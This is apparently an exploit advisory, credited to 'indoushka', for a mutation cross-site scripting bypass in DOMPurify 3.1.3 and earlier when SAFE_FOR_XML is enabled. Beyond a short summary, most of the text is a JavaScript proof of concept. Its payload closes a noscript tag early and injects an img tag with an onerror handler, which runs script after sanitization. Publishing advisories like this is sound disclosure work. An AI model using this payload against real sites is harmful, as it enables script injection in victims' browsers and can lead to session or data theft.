=============================================================================================================================================
| # Title     : DOMPurify ≤ 3.1.3 Mutation XSS via <noscript> Tag Bypass with SAFE_FOR_XML                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.npmjs.com/package/dompurify                                                                                     |
=============================================================================================================================================

[+] Summary    : A Mutation Cross-Site Scripting (mXSS) vulnerability exists in DOMPurify versions ≤ 3.1.3 when the SAFE_FOR_XML configuration is enabled. 
                 Due to improper handling of the </noscript> closing tag during sanitization, a crafted payload can bypass filtering mechanisms. 
				 The sanitizer processes the input as inert text, while the browser's HTML parser interprets it as executable markup when inserted into a <noscript> context. 
                 This parsing discrepancy allows attackers to inject malicious HTML elements (e.g., <img onerror>), leading to arbitrary JavaScript execution in the victim’s browser.
			  
[+] POC   :  

import DOMPurify from 'dompurify';

const payload = `</noscript><img src=x onerror=alert(1)>`;

const config = {
  SAFE_FOR_XML: true
};

const clean = DOMPurify.sanitize(payload, config);

console.log("Sanitized output:", clean);

const container = document.createElement("div");
container.innerHTML = `<noscript>${clean}</noscript>`;

document.body.appendChild(container);
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================